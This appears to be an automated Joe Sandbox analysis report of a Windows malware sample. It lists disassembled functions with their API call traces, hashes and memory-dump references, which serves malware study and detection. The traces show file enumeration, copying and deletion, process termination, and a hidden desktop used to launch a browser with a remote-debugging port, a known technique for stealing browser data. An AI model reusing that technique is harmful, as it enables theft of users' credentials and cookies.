                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 8ed4afde58f807619640b94feefac71c0abe8b7c88dbb9167e6f705143d534c6
                            • Instruction ID: ce36d06368393dbea7448348a1445e0938b48711875d0a51107d290d298281f7
                            • Opcode Fuzzy Hash: 8ed4afde58f807619640b94feefac71c0abe8b7c88dbb9167e6f705143d534c6
                            • Instruction Fuzzy Hash: D4C1517190025DABDB20DF64DC89EEE777AFF88304F408599F609E7290EE709A85CB51
                            Function 008F13B9 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F13E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1404
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F140F
                            • lstrlen.KERNEL32(00914CAC), ref: 008F141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1437
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F1443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F148A
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F14AC
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F14C6
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F14FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1532
                            • lstrlen.KERNEL32(0091179C), ref: 008F153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F155A
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1566
                            • lstrlen.KERNEL32(?), ref: 008F1573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1593
                            • lstrcat.KERNEL32(00000000,?), ref: 008F15A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F15CA
                            • StrCmpCA.SHLWAPI(?,012FDF20), ref: 008F15F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1634
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1685
                            • StrCmpCA.SHLWAPI(?,012FE0A0), ref: 008F16A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F16E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1734
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F18E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F190E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008F196C
                            • FindClose.KERNEL32(00000000), ref: 008F197B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: c2691fac117b91a9451dcc973398b08cd91b2a13ede338da67e0cfa362987c4c
                            • Instruction ID: 7c384b748b863cc053738c86928494abaf3b863ace5b7ca2ab283d4efedf33e0
                            • Opcode Fuzzy Hash: c2691fac117b91a9451dcc973398b08cd91b2a13ede338da67e0cfa362987c4c
                            • Instruction Fuzzy Hash: B6C19A31A1025AABCF21AF79DC8DAAE7BB8FF45300F444128B946E7251DF74DD418B91
                            Function 008E9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 008E9790
                            • lstrcat.KERNEL32(?,?), ref: 008E97A0
                            • lstrcat.KERNEL32(?,?), ref: 008E97B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 008E97C3
                            • memset.MSVCRT ref: 008E97D7
                              • Part of subcall function 00904040: lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00904075
                              • Part of subcall function 00904040: lstrcpy.KERNEL32(00000000,012FED98), ref: 0090409F
                              • Part of subcall function 00904040: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008E134E,?,0000001A), ref: 009040A9
                            • wsprintfA.USER32 ref: 008E9806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 008E9827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 008E9844
                              • Part of subcall function 009048B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009048C9
                              • Part of subcall function 009048B0: Process32First.KERNEL32(00000000,00000128), ref: 009048D9
                              • Part of subcall function 009048B0: Process32Next.KERNEL32(00000000,00000128), ref: 009048EB
                              • Part of subcall function 009048B0: StrCmpCA.SHLWAPI(?,?), ref: 009048FD
                              • Part of subcall function 009048B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00904912
                              • Part of subcall function 009048B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00904921
                              • Part of subcall function 009048B0: CloseHandle.KERNEL32(00000000), ref: 00904928
                              • Part of subcall function 009048B0: Process32Next.KERNEL32(00000000,00000128), ref: 00904936
                              • Part of subcall function 009048B0: CloseHandle.KERNEL32(00000000), ref: 00904941
                            • lstrcat.KERNEL32(00000000,?), ref: 008E9878
                            • lstrcat.KERNEL32(00000000,?), ref: 008E9889
                            • lstrcat.KERNEL32(00000000,00914B68), ref: 008E989B
                            • memset.MSVCRT ref: 008E98AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008E98D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E9903
                            • StrStrA.SHLWAPI(00000000,012FF840), ref: 008E9919
                            • lstrcpyn.KERNEL32(00B193D0,00000000,00000000), ref: 008E9938
                            • lstrlen.KERNEL32(?), ref: 008E994B
                            • wsprintfA.USER32 ref: 008E995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 008E9971
                            • Sleep.KERNEL32(00001388), ref: 008E99E7
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E92E1
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E92FA
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E9399
                              • Part of subcall function 008E92B0: strlen.MSVCRT ref: 008E93E6
                              • Part of subcall function 00904950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00904969
                              • Part of subcall function 00904950: Process32First.KERNEL32(00000000,00000128), ref: 00904979
                              • Part of subcall function 00904950: Process32Next.KERNEL32(00000000,00000128), ref: 0090498B
                              • Part of subcall function 00904950: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009049AC
                              • Part of subcall function 00904950: TerminateProcess.KERNEL32(00000000,00000000), ref: 009049BB
                              • Part of subcall function 00904950: CloseHandle.KERNEL32(00000000), ref: 009049C2
                              • Part of subcall function 00904950: Process32Next.KERNEL32(00000000,00000128), ref: 009049D0
                              • Part of subcall function 00904950: CloseHandle.KERNEL32(00000000), ref: 009049DB
                            • CloseDesktop.USER32(?), ref: 008E9A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: 02a8bf7d09f25fa9f33425d72937df432a3342b435fa4b71cf661bd2d4586b37
                            • Instruction ID: 1c2ba2e96eb0bdae4c93a9869be54ba36f4f2bdf8f064d19a722de70b76e76f2
                            • Opcode Fuzzy Hash: 02a8bf7d09f25fa9f33425d72937df432a3342b435fa4b71cf661bd2d4586b37
                            • Instruction Fuzzy Hash: 8B917371A40258AFDB10DBA4DC89FDE77B8FF48700F5085A5F609E7291DEB0AA448B91
                            Function 008FE3F0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 008FE40C
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FE423
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FE443
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FE45D
                            • wsprintfA.USER32 ref: 008FE482
                            • StrCmpCA.SHLWAPI(?,0090CFF4), ref: 008FE494
                            • wsprintfA.USER32 ref: 008FE4B1
                              • Part of subcall function 008FEFC0: lstrcpy.KERNEL32(00000000,?), ref: 008FEFF2
                            • wsprintfA.USER32 ref: 008FE4D0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 008FE4E4
                            • lstrcat.KERNEL32(?,012FFC58), ref: 008FE515
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FE527
                            • lstrcat.KERNEL32(?,?), ref: 008FE538
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FE54A
                            • lstrcat.KERNEL32(?,?), ref: 008FE55E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008FE574
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE5B2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE602
                            • DeleteFileA.KERNEL32(?), ref: 008FE63C
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008FE67B
                            • FindClose.KERNEL32(00000000), ref: 008FE68A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: 4af9adae5bc6397c6fda9a847b9bc055476f195a5fdb7fe2d170bdb6d5d30960
                            • Instruction ID: dee044776c69ef79353762501b97e90d7ede096973e0d3f9616280e93e4aa990
                            • Opcode Fuzzy Hash: 4af9adae5bc6397c6fda9a847b9bc055476f195a5fdb7fe2d170bdb6d5d30960
                            • Instruction Fuzzy Hash: 30815F7290025CABCB20EF74DC89AEE77B9FF58304F4089A8B509D3150EE74AA45CF91
                            Function 008E16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E16E2
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E176C
                            • lstrcat.KERNEL32(00000000), ref: 008E1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E17A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E18FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: d9cf08d50326fbaf436c9e3e954f1dff9064e669c93b9d39b14ec42a27c9a31d
                            • Instruction ID: 145c34c8c64386f390d0d38a9cac1ab2ed00e92b14fd758fc43877083cf430f7
                            • Opcode Fuzzy Hash: d9cf08d50326fbaf436c9e3e954f1dff9064e669c93b9d39b14ec42a27c9a31d
                            • Instruction Fuzzy Hash: 4381853591119AABCF21EF69DC89EAE7BB8FF46700F444124F805E7256CB709D41CB92
                            Function 008FDF20 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008FDF35
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008FDF3C
                            • wsprintfA.USER32 ref: 008FDF52
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FDF69
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FDF8C
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FDFA6
                            • wsprintfA.USER32 ref: 008FDFC4
                            • DeleteFileA.KERNEL32(?), ref: 008FE010
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008FDFDD
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                              • Part of subcall function 008FDB70: memset.MSVCRT ref: 008FDB91
                              • Part of subcall function 008FDB70: memset.MSVCRT ref: 008FDBA3
                              • Part of subcall function 008FDB70: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FDBCB
                              • Part of subcall function 008FDB70: lstrcpy.KERNEL32(00000000,?), ref: 008FDBFE
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,00000000), ref: 008FDC0C
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,012FF768), ref: 008FDC26
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,?), ref: 008FDC3A
                              • Part of subcall function 008FDB70: lstrcat.KERNEL32(?,012FDFB0), ref: 008FDC4E
                              • Part of subcall function 008FDB70: lstrcpy.KERNEL32(00000000,?), ref: 008FDC7E
                              • Part of subcall function 008FDB70: GetFileAttributesA.KERNEL32(00000000), ref: 008FDC85
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008FE01E
                            • FindClose.KERNEL32(00000000), ref: 008FE02D
                            • lstrcat.KERNEL32(?,012FFC58), ref: 008FE056
                            • lstrcat.KERNEL32(?,012FE140), ref: 008FE06A
                            • lstrlen.KERNEL32(?), ref: 008FE074
                            • lstrlen.KERNEL32(?), ref: 008FE082
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE0C2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 4a985e8e96d6f89bf48505dc3ad1cfac6576f8045ae2a8394e7b72553f031076
                            • Instruction ID: ee27226b0fa9f4c4b0074939a3de7193a00ddfe0001421cd10496ff8b6f2a3f8
                            • Opcode Fuzzy Hash: 4a985e8e96d6f89bf48505dc3ad1cfac6576f8045ae2a8394e7b72553f031076
                            • Instruction Fuzzy Hash: A6616172910258ABCB20EF78DC89EEE77B9FF88300F4085A8B605D7251DF74AA55CB51
                            Function 008FD720 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 008FD73D
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FD754
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FD774
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FD78E
                            • lstrcat.KERNEL32(?,012FFC58), ref: 008FD7D3
                            • lstrcat.KERNEL32(?,012FFBC8), ref: 008FD7E7
                            • lstrcat.KERNEL32(?,?), ref: 008FD7FB
                            • lstrcat.KERNEL32(?,?), ref: 008FD80C
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FD81E
                            • lstrcat.KERNEL32(?,?), ref: 008FD832
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FD872
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FD8C2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008FD927
                            • FindClose.KERNEL32(00000000), ref: 008FD936
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 44ec706f1b5088e15b6ff7b94a86400fde2d8c84b395a3ecc0b424798f38cf38
                            • Instruction ID: bb14d665a68afc63398bc36dce3ec4ff83beed5f266d540e9d4a1b030df48d8b
                            • Opcode Fuzzy Hash: 44ec706f1b5088e15b6ff7b94a86400fde2d8c84b395a3ecc0b424798f38cf38
                            • Instruction Fuzzy Hash: 3B615471910259ABCB10EF74DC88AEE77B9FF48300F4088A5E649E7251DB74AA45CF90
                            Function 00904AC0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
